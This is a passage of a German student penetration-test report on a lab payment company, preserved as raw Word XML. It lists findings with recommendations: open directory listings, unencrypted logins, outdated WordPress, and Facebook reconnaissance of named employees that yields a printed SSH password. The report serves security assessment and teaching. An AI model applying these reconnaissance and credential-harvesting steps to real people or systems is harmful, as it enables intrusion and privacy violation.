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280" w:right="-2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1681163</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2372539" cy="91916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72539" cy="919163"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-280" w:righ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360" w:lineRule="auto"/>
        <w:ind w:left="-280" w:righ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line="360" w:lineRule="auto"/>
        <w:ind w:right="-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ind w:left="-280" w:right="-28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Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-280" w:right="-28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Zielsystem: Dubius Payment  Ltd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-280" w:right="-28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2490788" cy="698854"/>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90788" cy="69885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280" w:righ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line="360" w:lineRule="auto"/>
        <w:ind w:left="-280" w:righ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ind w:left="-280" w:righ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Erstellungsdatum: 21.03.2020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360" w:lineRule="auto"/>
        <w:ind w:left="-280" w:right="-2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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-280" w:righ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left="-280" w:right="-2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left="-280" w:right="-28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Autoren:</w:t>
        <w:tab/>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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Matrikelnr.:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-280" w:righ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Kruck</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">752398</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Muhammed Selim Sinan</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">750907</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-280" w:right="-280" w:firstLine="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Inhaltsverzeichnis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-280" w:right="-2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yqjruuq4rzmt">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1 Änderungsverzeichnis</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _yqjruuq4rzmt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wmtnnjwa1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Ansprechpartner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_bwmtnnjwa1op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eoik1vvb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Auftraggeber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_o2eoik1vvbj3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coooj6h9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_l5coooj6h9hf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dnmcbljgr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Projektübersicht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_ndnmcbljgr4v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8lt2fboh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_3n8lt2fbohvl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j09gts27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Klassifizierung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_b1j09gts27i6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e7a153ml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Durchführungszeitraum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_v7e7a153mlfk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svxpqrke3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Managementübersicht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_esvxpqrke3t5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s2uv69onr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Technischer Bericht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_hs2uv69onrbs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3sdsan5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Schwachstellen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_483sdsan52x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rjnnnsct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Verzeichnisauflistung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_pmrjnnnsctzl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72ww18xa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Informationsleck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_hb72ww18xayo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v5uy3rma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Sensitive Data Exposure - Transport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_u9v5uy3rmaqo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rfy4n6ew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Alte Anwendungen mit bekannten Schwachstellen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_tdrfy4n6eww0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ccvnttty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Sensitive Data Exposure - Social Media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_w9ccvntttyf5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i7q9d0gd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Gestohlene/Unsichere Passwörter - Privilegierter Zugang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_99i7q9d0gdhs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q72t7vwj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PHP-Injection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_kvq72t7vwjpj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9iw61qaqn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Anhang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_r9iw61qaqnwb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otpi4p94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Vorgehensweise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_ihotpi4p94s2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pczhj2mc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Information Gathering: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_ufpczhj2mc89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6bq9l68g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Netzwerkscan der Zielsysteme und ihrer Dienste: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_5m6bq9l68gwc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286vhm91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Analyse der Webanwendungen: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_dt286vhm917w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w82x2vzh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Identifizierung von Schwachstellen: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_vyw82x2vzhao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4b7msdfg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Ausnutzen der Schwachstellen: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_mx4b7msdfg57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hsoo3xou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Privilegienausweitung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_pthsoo3xounp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mzyff2z1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Abschlussbericht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_ndmzyff2z1we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2t70sas8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Risikobewertung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_ys2t70sas8dp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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_58f0seok1ht2" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9myet0y9fsrs"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yqjruuq4rzmt" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 Änderungsverzeichnis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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="78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2400"/>
        <w:gridCol w:w="1650"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3780"/>
            <w:gridCol w:w="2400"/>
            <w:gridCol w:w="165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Änderung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Mitarbeiter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Entwurf des Berichts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Selim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Dokumentation der Schwachstellen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Selim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Erstellung des Berichts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Selim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Qualitätssicherung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Selim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29.03.2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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bwmtnnjwa1op" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2 Ansprechpartner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o2eoik1vvbj3" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Auftraggeber</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Dominik Sauer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binsec GmbH</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Europa-Allee 52</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60327 Frankfurt am Main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Telefonnr.: +49 69 2475607 13</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ds@binsec.com</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Webseite: https://www.binsec.com</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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l5coooj6h9hf" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Team</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Kruck</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lennart.kruck@stud.h-da.de</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Muhammed Selim Sinan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muhammed.s.sinan@stud.h-da.de</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ndnmcbljgr4v" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3 Projektübersicht</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3n8lt2fbohvl" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Scope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Für eine PCI-Zertifizierung ist die Dubius Payments Ltd. verpflichtet seine IT-Systeme einem Penetrationstest zu unterziehen. Hierzu wurden wir beauftragt und sollen die Infrastruktur aus Sicht eines Angreifers untersuchen. Das Netzwerk befindet sich im folgenden Netzbereich: 10.250.53.0/24</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IP-Adressen der Angreifer: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10.20.1.154 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Lennart Kruck</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10.20.1.86 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Muhammed Selim Sinan</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b1j09gts27i6" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Klassifizierung</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466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pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v7e7a153mlfk" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Durchführungszeitraum</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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="9840.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5520"/>
        <w:gridCol w:w="2025"/>
        <w:gridCol w:w="975"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1320"/>
            <w:gridCol w:w="5520"/>
            <w:gridCol w:w="2025"/>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Datum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Beschreibung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r>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="52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bestätigen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Einarbeitung in PenTest Kapitel 1 bis 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Einarbeitung in PenTest Kapitel 9 bis 18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Kali Linux installation und OpenVPN Konfiguration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Scannen von Netzwerken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Alle öffentliche Bereiche der Systeme durchforsten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Verzeichnisauflistung mit </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">dirb (10.250.53.35)</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Informationsleck weitere Erfolge probieren zu erzielen (10.250.53.36)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Verzeichnisauflistung WP Login abfangen mit BurpSuite (10.250.53.34)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Mitteilung “veraltete Version” von WPScan weitere Versuche probiert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durchforsten und PW herausgefunden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Privilegierten Zugang auf fast allen System erhalten und SSH-Verbindung aufgebaut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SSH-Verbindung Systeme weiter verstanden und weitere Clients vom privaten Netwerk herausgefunden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PHP-Injection durch ToDo-Wiki und Bind-Shell erzeugt (10.250.53.35)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Penetrationsbericht einzelne Kapitel verfassen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(Ansprechpartner und Projektübersicht)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Technischer Bericht verfassen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Managementübersicht erstellen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Anhang mit Vorgehensweise und Risikobewertung verfassen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Korrekturlesen und Layout verbessern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28.03.2020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GPG Verschlüsselungsverfahren verstehen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Lennart und Selim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erledigt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_esvxpqrke3t5" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4 Managementübersicht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folgende Tabelle zeigt als Übersicht, welche Schwachstellen gefunden wurden und welche Risiko-Bewertung diese haben.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530"/>
        <w:gridCol w:w="6285"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1170"/>
            <w:gridCol w:w="1530"/>
            <w:gridCol w:w="628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Nummer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Risikofaktor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Schwachstelle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Hoch (10)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Gestohlene/Unsichere Passwörter - Priviligierter Zugang</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Hoch (10)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Data Exposure - Transport Layer</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Hoch (9)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 Anwendungen mit bekannten Schwachstellen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Hoch (8)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Verzeichnisauflistung</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Mittel (7)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Data Exposure - Social Media</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9900"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mittel (7)</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PHP-Injection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Gering (5)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Informationsleck</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Risiko-Arten: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Hoch</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: unmittelbarer Handlungsbedarf (hohe Eintrittswahrscheinlichkeit, hoher Schaden)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9900"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mittel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: zeitnaher Handlungsbedarf (mittlere Eintrittswahrscheinlichkeit, mittlerer Schaden)</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Gering</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: zeitnaher Handlungsbedarf (geringe/mittlere Eintrittswahrscheinlichkeit, geringer</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Schaden)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hs2uv69onrbs" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5 Technischer Bericht</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_483sdsan52x" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Schwachstellen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pmrjnnnsctzl" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1.1 Verzeichnisauflistung</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Beschreibung:</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Verzeichnisauflistung ist in der Standardkonfiguration von Apache aktiviert. Es ist möglich, ohne ein entsprechendes Skript Inhalte eines Ordners im Browser auflisten zu</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die Auflistung und die Ausgabe der Dateien wird die Arbeit von potentiellen</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Angreifern erleichtert. Die Dateien enthalten unter anderem vertrauliche Informationen. Beim DokuWiki (10.250.53.35) gelangt ein Angreifer an nicht öffentliche Seiten. Diese enthalten unter anderem Dokumentationen über die IT-Sicherheit des Unternehmens.</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dem Befehl </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dirb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> kann man nach öffentlichen Verzeichnissen hinter einer Adresse suchen.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die Verzeichnisauflistung lief das Programm schneller durch. Wir haben Zugang zu allen Artikel des DokuWiki.</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 Verzeichnisauflistung</w:t>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114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4938713" cy="4011047"/>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38713" cy="4011047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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Empfehlung:</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Verzeichnisauflistung sollte deaktiviert werden. Vertrauliche Informationen sollten nicht an öffentlich zugängliche Zonen gespeichert werden.</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3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hb72ww18xayo" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1.2 Informationsleck</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Beschreibung</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werden auch Informationen über Schnittstellen, die dem Administrator vorbehalten sind preisgegeben.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Potenzielle Angreifer können diese Dokumentationen nutzen, um die Funktionsweise der Anwendung zu verstehen und im Falle eines privilegierten Zugangs auf diese Anwendung diese für sich zu nutzen</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System 10.250.53.36 über den Browser gibt folgendes aus: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357491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33800" cy="357491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5.2: Informationsleck</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Empfehlung:</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Schnittstellendokumentationen sollten in nicht öffentlichen Verzeichnissen gespeichert werden. Desweiteren aus der Sicht eines “Außenstehenden” die öffentlichen Verzeichnissen regelmäßig kontrollieren.</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3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u9v5uy3rmaqo" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1.3 Sensitive Data Exposure - Transport Layer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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Beschreibung</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 Datenverkehr zu Login-Bereichen in mehreren Systemen werden nicht mit HTTPS übertragen.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Betroffene Systeme sind:</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10.250.53.34 (Blog)</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10.250.53.35 (Wiki)</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10.250.53.36 (Paygate)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Login-Daten und Sessions können somit abgefangen und manipuliert werden. Durch Session-Hijacking kann ein Angreifer die Session eines authentifizierten Benutzers übernehmen und sich Zugang verschaffen.</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BurpSuite konnten wir unsere Login-Anfrage abfangen und in klartext die Daten sehen. So kann man auch die Anfragen anderer Nutzer abfangen.</w:t>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4323604"/>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95925" cy="432360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5.3: Sensitive Data Exposure - Transport Layer</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Empfehlung:</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auf HTTPS umzustellen benötigt man ein SSL-Zertifikat. Die offizielle Vergabestelle (CA), bei der man Zertifikat erwerben will, prüft die Identität und bürgt für die Richtigkeit der Angaben. Das SSL-Zertifikat wird auf dem Server abgelegt und jedes Mal aufgerufen, wenn ein Besucher die Website aufruft. Der Transportweg der Daten muss dadurch verschlüsselt werden.</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3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tdrfy4n6eww0" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1.4 Alte Anwendungen mit bekannten Schwachstellen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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Beschreibung</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System 10.250.53.34 verwendet eine alte Version von Wordpress. Dieser weist sehr viele Sicherheitslücken auf.</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gibt 74 Sicherheitslücken in dieser Wordpress-Instanz, welche unter anderem XSS-Injection und SQL-Injection ermöglichen.</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Mithilfe von </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">haben wir WordPress auf Schwachstellen untersucht.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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116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5.4: Alte Wordpress Version</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Empfehlung:</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 Update behebt die meisten dieser Schwachstellen.</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Tipp für automatische Haupt-Updates in WP:</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der wp-confige.php Datei define (’WP AUTO UPDATE CORE’, true); einfügen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_auhv5zy8sysg" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>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w9ccvntttyf5" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1.5 Sensitive Data Exposure - Social Media</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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Beschreibung:</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Rahmen des Information-Gatherings ist es sinnvoll die Social-Media-Plattformen des Zieles zu untersuchen. Auf Facebook wurde ein Profil des Unternehmens gefunden.</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972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5.5: Dubius Payment Ltd. Facebook-Profil</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Von diesem aus findet man auch ihre Mitarbeiter. Hierbei können vor allem unvorsichtige Mitarbeiter sensible Daten preisgeben. Deshalb werden alle Profile und Beiträge der Mitarbeiter von Angreifern durchsucht. Interessant sind vor allem Mitarbeiter mit privilegierten Zugängen. Der Benutzername </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">csimmons </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ist uns in den Systemen mehrfach begegnet.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Wenn in Benutzernamen die Echtnamen der Mitarbeiter enthalten sind, können diese Ziel von Social-Engineering oder Ausspähungen werden. Die dadurch gewonnenen Informationen können als Basis für weitere Angriffe dienen.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14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Wir gehen davon aus, dass Clyde Simmons, ein privilegierter Nutzer, der Ehemann von Chasity ist und untersuchen beide Profile.</w:t>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800" cy="2462213"/>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12480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5.6: Chasity Simmons Facebook-Profil</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 einem Bild welches Chasity Simmons gepostet hat, sieht man im Hintergrund ihren Arbeitsplatz. In der Regel ist es oft so, dass am Arbeitsplatz viele sensible Notizen sichtbar sind. Diese können bei einem Foto schnell unbewusst in die Öffentlichkeit gelangen. Wie im Bild 5.15 zu sehen ist, hängt hinten rechts an ihrem Monitor ein Post-it welches sehr sensible Informationen für uns beinhaltet. Durch auprobieren haben wir herausgefunden, dass es sich um ein Passwort des Nutzers csimmons im Paygate handelt. Mit dem gefundenen Passwort #CuCaiueiL&lt;3 können wir uns mit SSH Zugang verschaffen.</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7015851"/>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57738" cy="701585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5.7: Chasity Simmons Galerie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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Empfehlung</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 Arbeitsplatz sollte nicht fotografiert oder gefilmt werden. Mitarbeiter sollten geschult werden im Bereich Compliance, damit ein Sicherheitsbewusstsein und eine Sensibilisierung geschaffen wird.</w:t>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_99i7q9d0gdhs" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1.6 Gestohlene/Unsichere Passwörter - Privilegierter Zugang</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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Beschreibung:</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Anhand gestohlener Passwörter (siehe Abbildung 5.1.5) und öffentlichen Benutzernamen kann sich in jedes System Zugang verschafft werden. Aus den in 5.1.5 genannten Informationen kann beispielsweise eine individuelle Passwortliste für das Ziel generiert werden. Dazu gehören auch Listen von meist verwendeten Passwörtern.</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Auswirkung:</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einen privilegierten Zugang als root können Angreifer vollste Kontrolle über das System erlangen. Diesen kann man anschließend beliebig manipulieren. Aus Privaten Systemen können Daten geklaut werden, während öffentliche Systeme zum ausspähen weiterer Nutzer genutzt werden können. Zudem können wir ein System als Sprungbrett nutzen, um in vorher unerreichbare Netzwerke einzudringen. In kurzer Zeit kann somit ein ganzes Netzwerk übernommen werden</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Proof of Concept:</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probieren der Wörter in den Systemen konnten wir sehr schnell ein Volltreffer erzielen. Wir konnte uns über SSH in das Paygate (10.250.53.36) als </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
